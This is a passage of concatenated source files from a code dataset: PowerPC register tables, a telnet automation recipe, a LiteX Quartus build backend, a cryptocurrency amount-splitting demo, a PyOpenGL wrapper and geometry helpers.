Register('dcr35d', 4, 0x7d74),
Register('dcr35e', 4, 0x7d78),
Register('dcr35f', 4, 0x7d7c),
Register('dcr360', 4, 0x7d80),
Register('dcr361', 4, 0x7d84),
Register('dcr362', 4, 0x7d88),
Register('dcr363', 4, 0x7d8c),
Register('dcr364', 4, 0x7d90),
Register('dcr365', 4, 0x7d94),
Register('dcr366', 4, 0x7d98),
Register('dcr367', 4, 0x7d9c),
Register('dcr368', 4, 0x7da0),
Register('dcr369', 4, 0x7da4),
Register('dcr36a', 4, 0x7da8),
Register('dcr36b', 4, 0x7dac),
Register('dcr36c', 4, 0x7db0),
Register('dcr36d', 4, 0x7db4),
Register('dcr36e', 4, 0x7db8),
Register('dcr36f', 4, 0x7dbc),
Register('dcr370', 4, 0x7dc0),
Register('dcr371', 4, 0x7dc4),
Register('dcr372', 4, 0x7dc8),
Register('dcr373', 4, 0x7dcc),
Register('dcr374', 4, 0x7dd0),
Register('dcr375', 4, 0x7dd4),
Register('dcr376', 4, 0x7dd8),
Register('dcr377', 4, 0x7ddc),
Register('dcr378', 4, 0x7de0),
Register('dcr379', 4, 0x7de4),
Register('dcr37a', 4, 0x7de8),
Register('dcr37b', 4, 0x7dec),
Register('dcr37c', 4, 0x7df0),
Register('dcr37d', 4, 0x7df4),
Register('dcr37e', 4, 0x7df8),
Register('dcr37f', 4, 0x7dfc),
Register('dcr380', 4, 0x7e00),
Register('dcr381', 4, 0x7e04),
Register('dcr382', 4, 0x7e08),
Register('dcr383', 4, 0x7e0c),
Register('dcr384', 4, 0x7e10),
Register('dcr385', 4, 0x7e14),
Register('dcr386', 4, 0x7e18),
Register('dcr387', 4, 0x7e1c),
Register('dcr388', 4, 0x7e20),
Register('dcr389', 4, 0x7e24),
Register('dcr38a', 4, 0x7e28),
Register('dcr38b', 4, 0x7e2c),
Register('dcr38c', 4, 0x7e30),
Register('dcr38d', 4, 0x7e34),
Register('dcr38e', 4, 0x7e38),
Register('dcr38f', 4, 0x7e3c),
Register('dcr390', 4, 0x7e40),
Register('dcr391', 4, 0x7e44),
Register('dcr392', 4, 0x7e48),
Register('dcr393', 4, 0x7e4c),
Register('dcr394', 4, 0x7e50),
Register('dcr395', 4, 0x7e54),
Register('dcr396', 4, 0x7e58),
Register('dcr397', 4, 0x7e5c),
Register('dcr398', 4, 0x7e60),
Register('dcr399', 4, 0x7e64),
Register('dcr39a', 4, 0x7e68),
Register('dcr39b', 4, 0x7e6c),
Register('dcr39c', 4, 0x7e70),
Register('dcr39d', 4, 0x7e74),
Register('dcr39e', 4, 0x7e78),
Register('dcr39f', 4, 0x7e7c),
Register('dcr3a0', 4, 0x7e80),
Register('dcr3a1', 4, 0x7e84),
Register('dcr3a2', 4, 0x7e88),
Register('dcr3a3', 4, 0x7e8c),
Register('dcr3a4', 4, 0x7e90),
Register('dcr3a5', 4, 0x7e94),
Register('dcr3a6', 4, 0x7e98),
Register('dcr3a7', 4, 0x7e9c),
Register('dcr3a8', 4, 0x7ea0),
Register('dcr3a9', 4, 0x7ea4),
Register('dcr3aa', 4, 0x7ea8),
Register('dcr3ab', 4, 0x7eac),
Register('dcr3ac', 4, 0x7eb0),
Register('dcr3ad', 4, 0x7eb4),
Register('dcr3ae', 4, 0x7eb8),
Register('dcr3af', 4, 0x7ebc),
Register('dcr3b0', 4, 0x7ec0),
Register('dcr3b1', 4, 0x7ec4),
Register('dcr3b2', 4, 0x7ec8),
Register('dcr3b3', 4, 0x7ecc),
Register('dcr3b4', 4, 0x7ed0),
Register('dcr3b5', 4, 0x7ed4),
Register('dcr3b6', 4, 0x7ed8),
Register('dcr3b7', 4, 0x7edc),
Register('dcr3b8', 4, 0x7ee0),
Register('dcr3b9', 4, 0x7ee4),
Register('dcr3ba', 4, 0x7ee8),
Register('dcr3bb', 4, 0x7eec),
Register('dcr3bc', 4, 0x7ef0),
Register('dcr3bd', 4, 0x7ef4),
Register('dcr3be', 4, 0x7ef8),
Register('dcr3bf', 4, 0x7efc),
Register('dcr3c0', 4, 0x7f00),
Register('dcr3c1', 4, 0x7f04),
Register('dcr3c2', 4, 0x7f08),
Register('dcr3c3', 4, 0x7f0c),
Register('dcr3c4', 4, 0x7f10),
Register('dcr3c5', 4, 0x7f14),
Register('dcr3c6', 4, 0x7f18),
Register('dcr3c7', 4, 0x7f1c),
Register('dcr3c8', 4, 0x7f20),
Register('dcr3c9', 4, 0x7f24),
Register('dcr3ca', 4, 0x7f28),
Register('dcr3cb', 4, 0x7f2c),
Register('dcr3cc', 4, 0x7f30),
Register('dcr3cd', 4, 0x7f34),
Register('dcr3ce', 4, 0x7f38),
Register('dcr3cf', 4, 0x7f3c),
Register('dcr3d0', 4, 0x7f40),
Register('dcr3d1', 4, 0x7f44),
Register('dcr3d2', 4, 0x7f48),
Register('dcr3d3', 4, 0x7f4c),
Register('dcr3d4', 4, 0x7f50),
Register('dcr3d5', 4, 0x7f54),
Register('dcr3d6', 4, 0x7f58),
Register('dcr3d7', 4, 0x7f5c),
Register('dcr3d8', 4, 0x7f60),
Register('dcr3d9', 4, 0x7f64),
Register('dcr3da', 4, 0x7f68),
Register('dcr3db', 4, 0x7f6c),
Register('dcr3dc', 4, 0x7f70),
Register('dcr3dd', 4, 0x7f74),
Register('dcr3de', 4, 0x7f78),
Register('dcr3df', 4, 0x7f7c),
Register('dcr3e0', 4, 0x7f80),
Register('dcr3e1', 4, 0x7f84),
Register('dcr3e2', 4, 0x7f88),
Register('dcr3e3', 4, 0x7f8c),
Register('dcr3e4', 4, 0x7f90),
Register('dcr3e5', 4, 0x7f94),
Register('dcr3e6', 4, 0x7f98),
Register('dcr3e7', 4, 0x7f9c),
Register('dcr3e8', 4, 0x7fa0),
Register('dcr3e9', 4, 0x7fa4),
Register('dcr3ea', 4, 0x7fa8),
Register('dcr3eb', 4, 0x7fac),
Register('dcr3ec', 4, 0x7fb0),
Register('dcr3ed', 4, 0x7fb4),
Register('dcr3ee', 4, 0x7fb8),
Register('dcr3ef', 4, 0x7fbc),
Register('dcr3f0', 4, 0x7fc0),
Register('dcr3f1', 4, 0x7fc4),
Register('dcr3f2', 4, 0x7fc8),
Register('dcr3f3', 4, 0x7fcc),
Register('dcr3f4', 4, 0x7fd0),
Register('dcr3f5', 4, 0x7fd4),
Register('dcr3f6', 4, 0x7fd8),
Register('dcr3f7', 4, 0x7fdc),
Register('dcr3f8', 4, 0x7fe0),
Register('dcr3f9', 4, 0x7fe4),
Register('dcr3fa', 4, 0x7fe8),
Register('dcr3fb', 4, 0x7fec),
Register('dcr3fc', 4, 0x7ff0),
Register('dcr3fd', 4, 0x7ff4),
Register('dcr3fe', 4, 0x7ff8),
Register('dcr3ff', 4, 0x7ffc),
Register('acc', 8, 0x10000)
]
# Register this architecture description so it can be looked up by its
# language id: 32-bit little-endian PowerPC QUICC.
register_arch(['powerpc:le:32:quicc'], 32, Endness.LE, ArchPcode_PowerPC_LE_32_QUICC)
|
recipes/Python/52228_Remote_control_with_telnetlib/recipe-52228.py | tdiprima/code | 2,023 | 9633 | <reponame>tdiprima/code<filename>recipes/Python/52228_Remote_control_with_telnetlib/recipe-52228.py
# auto_telnet.py - remote control via telnet
import os, sys, string, telnetlib
from getpass import getpass
class AutoTelnet:
    """Log in to a telnet host as each listed user and run a list of commands.

    All passwords are collected up front via getpass so the remaining run is
    unattended.  For every user a session is opened on the same Telnet object,
    the login/password dialog is driven, each command in ``cmd_list`` is sent,
    and every response read from the server is echoed to stdout.

    Fixes over the original recipe: deprecated ``string`` module functions
    (``string.count``) replaced by the equivalent ``str.count`` method, and
    multi-token ``print`` statements rewritten as single-argument calls so the
    output is unchanged but the syntax is not Python-2-only.
    """

    def __init__(self, user_list, cmd_list, **kw):
        # Optional keyword settings with their defaults.
        self.host = kw.get('host', 'localhost')
        self.timeout = kw.get('timeout', 600)            # seconds to wait per command
        self.command_prompt = kw.get('command_prompt', "$ ")
        # Ask for every password first, so no prompt interrupts the session loop.
        self.passwd = {}
        for user in user_list:
            self.passwd[user] = getpass("Enter user '%s' password: " % user)
        self.telnet = telnetlib.Telnet()
        for user in user_list:
            self.telnet.open(self.host)
            ok = self.action(user, cmd_list)
            if not ok:
                print("Unable to process: %s" % user)
            self.telnet.close()

    def action(self, user, cmd_list):
        """Drive one login session for *user*; return 1 on success, 0 on failure."""
        t = self.telnet
        t.write("\n")
        login_prompt = "login: "
        response = t.read_until(login_prompt, 5)
        if response.count(login_prompt):
            print(response)
        else:
            # Never saw the login prompt -- give up on this user.
            return 0
        password_prompt = "Password:"
        t.write("%s\n" % user)
        response = t.read_until(password_prompt, 3)
        if response.count(password_prompt):
            print(response)
        else:
            return 0
        t.write("%s\n" % self.passwd[user])
        response = t.read_until(self.command_prompt, 5)
        if not response.count(self.command_prompt):
            # Wrong password or unexpected shell prompt.
            return 0
        for cmd in cmd_list:
            t.write("%s\n" % cmd)
            response = t.read_until(self.command_prompt, self.timeout)
            if not response.count(self.command_prompt):
                return 0
            print(response)
        return 1
if __name__ == '__main__':
    basename = os.path.splitext(os.path.basename(sys.argv[0]))[0]
    # Fall back to USERNAME (Windows) when LOGNAME (POSIX) is unset.
    logname = os.environ.get("LOGNAME", os.environ.get("USERNAME"))
    host = 'localhost'
    import getopt
    optlist, user_list = getopt.getopt(sys.argv[1:], 'c:f:h:')
    usage = """
usage: %s [-h host] [-f cmdfile] [-c "command"] user1 user2 ...
    -c command
    -f command file
    -h host (default: '%s')
Example: %s -c "echo $HOME" %s
""" % (basename, host, basename, logname)
    if len(sys.argv) < 2:
        print(usage)
        sys.exit(1)
    cmd_list = []
    for (opt, optarg) in optlist:
        if opt == '-f':
            # Read commands from a file, skipping blank lines; 'with'
            # guarantees the handle is closed (the original leaked it).
            with open(optarg) as cmd_file:
                for r in cmd_file.readlines():
                    if r.rstrip():
                        cmd_list.append(r)
        elif opt == '-c':
            command = optarg
            # Strip one pair of surrounding double quotes, if present.
            if command[0] == '"' and command[-1] == '"':
                command = command[1:-1]
            cmd_list.append(command)
        elif opt == '-h':
            host = optarg
    autoTelnet = AutoTelnet(user_list, cmd_list, host=host)
|
Codes/Python32/Lib/importlib/test/extension/test_path_hook.py | eyantra/FireBird_Swiss_Knife | 319 | 9637 | from importlib import _bootstrap
from . import util
import collections
import imp
import sys
import unittest
class PathHookTests(unittest.TestCase):

    """Test the path hook for extension modules."""

    # XXX Should it only succeed for pre-existing directories?
    # XXX Should it only work for directories containing an extension module?

    def hook(self, entry):
        # Delegate to the bootstrap file path hook under test.
        return _bootstrap._file_path_hook(entry)

    def test_success(self):
        # A directory known to contain an extension module should yield
        # an object exposing the finder protocol.
        finder = self.hook(util.PATH)
        self.assertTrue(hasattr(finder, 'find_module'))
def test_main():
    """Run this module's test cases through test.support's runner."""
    from test.support import run_unittest
    run_unittest(PathHookTests)


if __name__ == '__main__':
    test_main()
|
external_plugin_deps.bzl | michalgagat/plugins_oauth | 143 | 9646 | <reponame>michalgagat/plugins_oauth
load("//tools/bzl:maven_jar.bzl", "maven_jar")
def external_plugin_deps(omit_commons_codec = True):
    """Declare the external Maven jars this OAuth plugin depends on.

    Args:
      omit_commons_codec: when True (the default), do not fetch
        commons-codec, e.g. because the embedding build already
        provides it.
    """

    # Keep all Jackson artifacts pinned to a single version.
    JACKSON_VERS = "2.10.2"

    maven_jar(
        name = "scribejava-core",
        artifact = "com.github.scribejava:scribejava-core:6.9.0",
        sha1 = "ed761f450d8382f75787e8fee9ae52e7ec768747",
    )

    maven_jar(
        name = "jackson-annotations",
        artifact = "com.fasterxml.jackson.core:jackson-annotations:" + JACKSON_VERS,
        sha1 = "3a13b6105946541b8d4181a0506355b5fae63260",
    )

    # jackson-databind pulls in jackson-annotations at runtime.
    maven_jar(
        name = "jackson-databind",
        artifact = "com.fasterxml.jackson.core:jackson-databind:" + JACKSON_VERS,
        sha1 = "0528de95f198afafbcfb0c09d2e43b6e0ea663ec",
        deps = [
            "@jackson-annotations//jar",
        ],
    )

    if not omit_commons_codec:
        maven_jar(
            name = "commons-codec",
            artifact = "commons-codec:commons-codec:1.4",
            sha1 = "4216af16d38465bbab0f3dff8efa14204f7a399a",
        )
|
litex/build/altera/quartus.py | osterwood/litex | 1,501 | 9678 | #
# This file is part of LiteX.
#
# Copyright (c) 2014-2019 <NAME> <<EMAIL>>
# Copyright (c) 2019 msloniewski <<EMAIL>>
# Copyright (c) 2019 vytautasb <<EMAIL>>
# SPDX-License-Identifier: BSD-2-Clause
import os
import subprocess
import sys
import math
from shutil import which
from migen.fhdl.structure import _Fragment
from litex.build.generic_platform import Pins, IOStandard, Misc
from litex.build import tools
# IO/Placement Constraints (.qsf) ------------------------------------------------------------------
def _format_constraint(c, signame, fmt_r):
    """Render one constraint object as a Quartus .qsf assignment line.

    c       -- a Pins, IOStandard or Misc constraint object.
    signame -- the signal name the assignment applies to.
    fmt_r   -- human-readable resource label, emitted via -comment.
    Returns None for constraint types it does not recognize.
    """
    # Pin placement constraint.
    if isinstance(c, Pins):
        return ("set_location_assignment -comment \"{name}\""
                " -to {signame} Pin_{pin}").format(
                    signame=signame, name=fmt_r, pin=c.identifiers[0])
    # Electrical IO standard for the pad.
    if isinstance(c, IOStandard):
        return ("set_instance_assignment -name io_standard"
                " -comment \"{name}\" \"{std}\" -to {signame}").format(
                    signame=signame, name=fmt_r, std=c.name)
    # Free-form assignment: either a (name, value) pair or a bare flag.
    if isinstance(c, Misc):
        if not isinstance(c.misc, str) and len(c.misc) == 2:
            return ("set_instance_assignment -comment \"{name}\""
                    " -name {misc[0]} \"{misc[1]}\" -to {signame}").format(
                        signame=signame, name=fmt_r, misc=c.misc)
        return ("set_instance_assignment -comment \"{name}\""
                " -name {misc} -to {signame}").format(
                    signame=signame, name=fmt_r, misc=c.misc)
def _format_qsf_constraint(signame, pin, others, resname):
    """Build the .qsf lines for one signal: its pin plus any extra constraints."""
    # Human-readable resource label, e.g. "serial:0" or "serial:0.tx".
    resource_label = "{}:{}".format(*resname[:2])
    if resname[2] is not None:
        resource_label = resource_label + "." + resname[2]
    # The pin location is always emitted first, then the remaining constraints.
    lines = []
    for constraint in [Pins(pin)] + others:
        lines.append(_format_constraint(constraint, signame, resource_label))
    return '\n'.join(lines)
def _build_qsf_constraints(named_sc, named_pc):
qsf = []
for sig, pins, others, resname in named_sc:
if len(pins) > 1:
for i, p in enumerate(pins):
qsf.append(_format_qsf_constraint("{}[{}]".format(sig, i), p, others, resname))
else:
qsf.append(_format_qsf_constraint(sig, pins[0], others, resname))
if named_pc:
qsf.append("\n\n".join(named_pc))
return "\n".join(qsf)
# Timing Constraints (.sdc) ------------------------------------------------------------------------
def _build_sdc(clocks, false_paths, vns, named_sc, build_name, additional_sdc_commands):
    """Generate the design timing constraints file (<build_name>.sdc)."""
    sdc = []

    # Clock constraints: a clock that maps to a top-level port is constrained
    # on the port, an internal clock is constrained on its net.
    for clk, period in sorted(clocks.items(), key=lambda x: x[0].duid):
        clk_name = vns.get_name(clk)
        is_port = any(sig == clk_name for sig, pins, others, resname in named_sc)
        target = "get_ports" if is_port else "get_nets"
        sdc.append("create_clock -name {clk} -period {period} [{target} {{{clk}}}]".format(
            clk=clk_name, period=str(period), target=target))

    # False path constraints between unrelated clock domains.
    for from_, to in sorted(false_paths, key=lambda x: (x[0].duid, x[1].duid)):
        sdc.append("set_false_path -from [get_clocks {{{from_}}}] -to [get_clocks {{{to}}}]".format(
            from_=vns.get_name(from_), to=vns.get_name(to)))

    # User-provided extra commands.
    sdc += additional_sdc_commands

    # Write out the .sdc.
    tools.write_to_file("{}.sdc".format(build_name), "\n".join(sdc))
# Project (.qsf) -----------------------------------------------------------------------------------
def _build_qsf(device, ips, sources, vincpaths, named_sc, named_pc, build_name, additional_qsf_commands):
    """Generate the Quartus project file (<build_name>.qsf).

    :param device: FPGA part name
    :param ips: list of Qsys/IP file paths
    :param sources: list of (filename, language, library) tuples
    :param vincpaths: verilog include search paths (extended in-place with header dirs)
    :param named_sc: signal constraints
    :param named_pc: platform constraints
    :param build_name: base name of the project / top-level entity
    :param additional_qsf_commands: user-provided extra .qsf lines
    """
    qsf = []

    # Set device
    qsf.append("set_global_assignment -name DEVICE {}".format(device))

    # Add sources
    for filename, language, library in sources:
        if language == "verilog": language = "systemverilog" # Enforce use of SystemVerilog
        tpl = "set_global_assignment -name {lang}_FILE {path} -library {lib}"
        # Do not add None type files
        if language is not None:
            qsf.append(tpl.format(lang=language.upper(), path=filename.replace("\\", "/"), lib=library))
        # Check if the file is a header. Those should not be explicitly added to qsf,
        # but rather included in include search_path
        else:
            if filename.endswith(".svh") or filename.endswith(".vh"):
                fpath = os.path.dirname(filename)
                if fpath not in vincpaths:
                    vincpaths.append(fpath)

    # Add ips
    # Fix: the template previously contained a literal "(unknown)" placeholder and
    # str.replace() was called with a keyword argument, which is a TypeError at
    # runtime. Use a real format field with str.format() instead.
    for filename in ips:
        tpl = "set_global_assignment -name QSYS_FILE {filename}"
        qsf.append(tpl.format(filename=filename.replace("\\", "/")))

    # Add include paths
    for path in vincpaths:
        qsf.append("set_global_assignment -name SEARCH_PATH {}".format(path.replace("\\", "/")))

    # Set top level
    qsf.append("set_global_assignment -name top_level_entity " + build_name)

    # Add io, placement constraints
    qsf.append(_build_qsf_constraints(named_sc, named_pc))

    # Set timing constraints
    qsf.append("set_global_assignment -name SDC_FILE {}.sdc".format(build_name))

    # Add additional commands
    qsf += additional_qsf_commands

    # Generate .qsf
    tools.write_to_file("{}.qsf".format(build_name), "\n".join(qsf))
# Script -------------------------------------------------------------------------------------------
def _build_script(build_name, create_rbf):
    """Generate the platform-specific Quartus build script.

    Emits a .bat file on Windows/Cygwin and a .sh file elsewhere, running the
    quartus_map/fit/asm/sta flow and optionally converting the .sof to a .rbf.

    :param build_name: base name of the project (used for file names)
    :param create_rbf: if True, append a .sof -> .rbf conversion step
    :return: the name of the generated script file
    """
    if sys.platform in ["win32", "cygwin"]:
        script_contents = "REM Autogenerated by LiteX / git: " + tools.get_litex_git_revision()
        script_file = "build_" + build_name + ".bat"
    else:
        script_contents = "# Autogenerated by LiteX / git: " + tools.get_litex_git_revision()
        script_file = "build_" + build_name + ".sh"
    script_contents += """
quartus_map --read_settings_files=on --write_settings_files=off {build_name} -c {build_name}
quartus_fit --read_settings_files=off --write_settings_files=off {build_name} -c {build_name}
quartus_asm --read_settings_files=off --write_settings_files=off {build_name} -c {build_name}
quartus_sta {build_name} -c {build_name}"""
    if create_rbf:
        # NOTE(review): this snippet is bash syntax but is also appended to the
        # .bat script on win32/cygwin, where it would fail -- confirm whether
        # Windows + create_rbf is a supported combination.
        script_contents += """
if [ -f "{build_name}.sof" ]
then
quartus_cpf -c {build_name}.sof {build_name}.rbf
fi
"""
    script_contents = script_contents.format(build_name=build_name)
    tools.write_to_file(script_file, script_contents, force_unix=True)
    return script_file
def _run_script(script):
    """Execute a generated build script with the platform-appropriate shell.

    :param script: path of the script produced by _build_script
    :raises OSError: if the Quartus toolchain is missing or the build fails
    """
    if sys.platform in ["win32", "cygwin"]:
        shell = ["cmd", "/c"]
    else:
        shell = ["bash"]

    # Fail early with a clear message when Quartus is not in the PATH.
    if which("quartus_map") is None:
        msg = "Unable to find Quartus toolchain, please:\n"
        msg += "- Add Quartus toolchain to your $PATH."
        raise OSError(msg)

    # Fix: "occured" -> "occurred" in the user-facing error message.
    if subprocess.call(shell + [script]) != 0:
        raise OSError("Error occurred during Quartus's script execution.")
# AlteraQuartusToolchain ---------------------------------------------------------------------------
class AlteraQuartusToolchain:
    """LiteX build backend for the Intel/Altera Quartus toolchain.

    Collects user constraints, generates the project (.qsf), timing (.sdc)
    and build script files for a platform/fragment, and optionally runs the
    Quartus flow on them.
    """

    # Platform attribute -> toolchain constraint translation (none needed here).
    attr_translate = {}

    def __init__(self):
        # Clock signal -> period (ns), filled by add_period_constraint().
        self.clocks = dict()
        # Set of (from_clk, to_clk) pairs, filled by add_false_path_constraint().
        self.false_paths = set()
        # Extra raw lines appended to the generated .sdc / .qsf files.
        self.additional_sdc_commands = []
        self.additional_qsf_commands = []

    def build(self, platform, fragment,
        build_dir  = "build",
        build_name = "top",
        run        = True,
        **kwargs):
        """Generate all build files for the fragment and optionally run Quartus.

        :param platform: LiteX platform (provides device, sources, IOs, ...)
        :param fragment: Migen fragment (or module convertible to one) to build
        :param build_dir: directory the build files are written to (created if needed)
        :param build_name: base name for generated files and the top-level entity
        :param run: if True, execute the generated build script
        :param kwargs: forwarded to platform.get_verilog()
        :return: the verilog namespace of the generated design
        """

        # Create build directory (the cwd is restored after the build).
        cwd = os.getcwd()
        os.makedirs(build_dir, exist_ok=True)
        os.chdir(build_dir)

        # Finalize design
        if not isinstance(fragment, _Fragment):
            fragment = fragment.get_fragment()
        platform.finalize(fragment)

        # Generate verilog
        v_output = platform.get_verilog(fragment, name=build_name, **kwargs)
        named_sc, named_pc = platform.resolve_signals(v_output.ns)
        v_file = build_name + ".v"
        v_output.write(v_file)
        platform.add_source(v_file)

        # Generate design timing constraints file (.sdc)
        _build_sdc(
            clocks = self.clocks,
            false_paths = self.false_paths,
            vns = v_output.ns,
            named_sc = named_sc,
            build_name = build_name,
            additional_sdc_commands = self.additional_sdc_commands)

        # Generate design project and location constraints file (.qsf)
        _build_qsf(
            device = platform.device,
            ips = platform.ips,
            sources = platform.sources,
            vincpaths = platform.verilog_include_paths,
            named_sc = named_sc,
            named_pc = named_pc,
            build_name = build_name,
            additional_qsf_commands = self.additional_qsf_commands)

        # Generate build script
        script = _build_script(build_name, platform.create_rbf)

        # Run
        if run:
            _run_script(script)

        os.chdir(cwd)

        return v_output.ns

    def add_period_constraint(self, platform, clk, period):
        """Constrain clk to the given period (ns), rounded down to 1 ps.

        :raises ValueError: if clk already has a different period constraint.
        """
        clk.attr.add("keep")
        period = math.floor(period*1e3)/1e3 # round to lowest picosecond
        if clk in self.clocks:
            if period != self.clocks[clk]:
                raise ValueError("Clock already constrained to {:.2f}ns, new constraint to {:.2f}ns"
                    .format(self.clocks[clk], period))
        self.clocks[clk] = period

    def add_false_path_constraint(self, platform, from_, to):
        """Mark the (from_, to) clock pair as a false path (direction-insensitive)."""
        from_.attr.add("keep")
        to.attr.add("keep")
        # Only record the pair once, regardless of direction.
        if (to, from_) not in self.false_paths:
            self.false_paths.add((from_, to))
|
Knapsack.py | byterubpay/mininero1 | 182 | 9688 | <reponame>byterubpay/mininero1
import Crypto.Random.random as rand
import itertools
import math #for log
import sys
def decomposition(i):
    """Yield a random sequence of positive parts that sum to i.

    Each part is drawn uniformly from [1, remaining]; as the original note
    (from stack exchange) says, the resulting partition is not uniform.
    """
    remaining = i
    while remaining > 0:
        part = rand.randint(1, remaining)
        yield part
        remaining -= part
def Decomposition(i):
    """Return a random partition of i into *distinct* parts.

    Rejection-samples decomposition(i) until all parts are unique.
    """
    while True:
        parts = list(decomposition(i))
        if len(parts) == len(set(parts)):
            return parts
def decomposition2(n, s, d, k):
    #home-brewed, returns no duplicates, includes the number d
    """Split n into s unique parts, with a cut exactly at d.

    Returns (change, send) where `send` parts sum to d and `change` parts sum
    to n - d. Rejection-samples random cut points until all parts are unique
    and the change side has more than k parts.
    """
    s = s - 1
    n = n
    while True:
        # Random cut points in [0, n], always including d itself.
        a = [d]
        nn = n
        #a.append(d)
        for i in range(0, s):
            a.append(rand.randint(0, n))
        a.sort()
        #print("a", a)
        b = []  # parts from cuts >= d (the "send" side)
        c = []  # parts from cuts < d (the "change" side)
        # Walk the cuts from the top; each part is the gap to the previous cut.
        while len(a) > 0:
            t = a.pop()
            #print(t, a)
            if t >= d:
                b.append(nn - t)
            else:
                c.append(nn - t)
            nn = t
        c.append(nn)
        tot = b[:] + c[:]
        #print("b", b)
        # sum(set(tot)) == n only holds when all parts are unique (no zero-size
        # gaps or duplicates); also require more than k change parts.
        if sum(set(tot)) == n and len(c) > int(k):
            return sorted(c), sorted(b)
def decomposition3(n, s, d, k):
    #a combination of both methods, designed to get some smaller values
    """Split n like decomposition2, then break up oversized parts.

    Parts larger than n/s (send side) or n/(s-1) (change side) are replaced
    by a further random decomposition so the final amounts are smaller.
    """
    # Fix: the original mutated `send`/`change` (list.remove + rebinding) while
    # iterating over them, which skips elements and can leave oversized parts
    # unsplit. Build new lists from snapshots instead.
    def _split_oversized(parts, limit):
        # One-line purpose: replace each part above `limit` by a random
        # decomposition of it, keeping smaller parts as-is.
        out = []
        for amount in list(parts):
            if amount > limit:
                out.extend(Decomposition(amount))
            else:
                out.append(amount)
        return out

    send, change = decomposition2(n, s, d, k)
    send = _split_oversized(send, n / s)
    change = _split_oversized(change, n / (s - 1))
    return send, change
def divv(l, m):
    """Return the elements of l divided by m, as floats."""
    scale = float(m)
    return [value / scale for value in l]
def frexp10(x):
    """Decompose x as (mantissa, exponent) with x == mantissa * 10**exponent.

    NOTE(review): the exponent is int(log10(x)), which truncates toward zero,
    so for 0 < x < 1 the mantissa falls below 1 instead of lying in [1, 10).
    decideAmounts relies on this exact behavior.
    """
    exponent = int(math.log10(x))
    mantissa = x / 10 ** exponent
    return mantissa, exponent
def decideAmounts(totalInputs, toSend, Partitions, k, fuzz):
    #fuzz is an optional amount to fuzz the transaction by
    #so if you start with a big obvious number like 2000, it might be fuzzed by up to "fuzz" amount
    """Demo: split a payment into randomized outputs to hide the sent amount.

    :param totalInputs: total value available to spend
    :param toSend: amount to send (before random fuzzing)
    :param Partitions: number of parts to split the total into
    :param k: minimum number of change outputs required
    :param fuzz: upper bound of a random amount added to toSend
    """
    # Perturb the sent amount by up to `fuzz`, with 3 decimal places.
    fz = rand.randint(0, int(fuzz * 1000) ) / 1000.0
    toSend += fz
    # Pick a scale factor M so the decomposition can work on exact integers
    # with enough resolution for 2**Partitions distinct values.
    g, ii =frexp10(totalInputs)
    ii = 10 ** (-1 * min(ii - 2, 0))
    print("ii", ii)
    M = 10 ** (int(math.log(2 ** Partitions) / math.log(10))) * ii
    #M = 10 ** M
    print("multiplier:", M)
    totalInputs = int(totalInputs * M)
    toSend = int(toSend * M)
    change = totalInputs - toSend  # NOTE(review): computed but never used below
    send_amounts, change_amounts = decomposition3(totalInputs, Partitions, toSend, k)
    all_amounts = send_amounts[:] + change_amounts[:]
    rand.shuffle(all_amounts)
    print("")
    print("change amounts:", divv(change_amounts, M))
    print("send amounts:", divv(send_amounts, M))
    print("now from the following, how much is sent?")
    print("all amounts:", sorted(divv(all_amounts, M)))
    print("possible sent amounts:")
    amounts = []
    # Enumerate the sums of all subsets of the outputs: an observer cannot
    # tell which subset was the real payment.
    for L in range(0, len(all_amounts)+1):
        for subset in itertools.combinations(all_amounts, L):
            amounts.append(sum(subset))
    print("number of possible sent amounts:")
    print(len(amounts))
    print("2^N:", 2 ** len(all_amounts))
    print("number of possible sent amounts duplicates removed:")
    print(len(list(set(amounts))))
# Demo entry point: `python Knapsack.py <totalInputs> <toSend>`.
if len(sys.argv) > 2:
    kk = 2  # NOTE(review): dead assignment -- immediately overwritten below
    parts = 7
    # NOTE(review): randint(1, int(7/4)) is randint(1, 1), so kk is always 1.
    kk = rand.randint(1, int(parts / 4)) #how many sends to demand
    fuzz = 1
    decideAmounts(float(sys.argv[1]), float(sys.argv[2]), parts, kk, fuzz)
|
deep-rl/lib/python2.7/site-packages/OpenGL/GL/ARB/transform_feedback_instanced.py | ShujaKhalid/deep-rl | 210 | 9764 | <filename>deep-rl/lib/python2.7/site-packages/OpenGL/GL/ARB/transform_feedback_instanced.py<gh_stars>100-1000
'''OpenGL extension ARB.transform_feedback_instanced
This module customises the behaviour of the
OpenGL.raw.GL.ARB.transform_feedback_instanced to provide a more
Python-friendly API
Overview (from the spec)
Multiple instances of geometry may be specified to the GL by calling
functions such as DrawArraysInstanced and DrawElementsInstanced. Further,
the results of a transform feedback operation may be returned to the GL
by calling DrawTransformFeedback, or DrawTransformFeedbackStream. However,
it is not presently possible to draw multiple instances of data
transform feedback without using a query and the resulting round trip from
server to client.
This extension adds functionality to draw multiple instances of the result
of a transform feedback operation.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/transform_feedback_instanced.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.transform_feedback_instanced import *
from OpenGL.raw.GL.ARB.transform_feedback_instanced import _EXTENSION_NAME
def glInitTransformFeedbackInstancedARB():
    '''Return boolean indicating whether this extension is available'''
    # Local import mirrors the autogenerated wrapper style; queries the
    # current GL context for ARB_transform_feedback_instanced support.
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
ahrs/common/geometry.py | jaluebbe/ahrs | 184 | 9788 | <filename>ahrs/common/geometry.py
# -*- coding: utf-8 -*-
"""
Geometrical functions
---------------------
References
----------
.. [W1] Wikipedia: https://de.wikipedia.org/wiki/Ellipse#Ellipsengleichung_(Parameterform)
.. [WAE] Wolfram Alpha: Ellipse. (http://mathworld.wolfram.com/Ellipse.html)
"""
import numpy as np
from typing import Union
def circle(center: Union[list, np.ndarray], radius: float = 1.0, num_points: int = 20) -> np.ndarray:
    """
    Build a circle with the given characteristics.

    Parameters
    ----------
    center : array-like
        2D Coordinates of the center.
    radius : float
        Radius of the circle.
    num_points : int
        Number of points to build.

    Returns
    -------
    points : numpy.ndarray
        (num_points+1)-by-2 array with the coordinates of the circle; the
        last point closes the loop (equal to the first).
    """
    angles = np.linspace(0.0, 2.0*np.pi, num_points+1)
    xs = center[0] + radius*np.cos(angles)
    ys = center[1] + radius*np.sin(angles)
    return np.stack([xs, ys], axis=1)
def ellipse(center: Union[list, np.ndarray], phi: float, axes: Union[list, np.ndarray], num_points: int = 20) -> np.ndarray:
    """
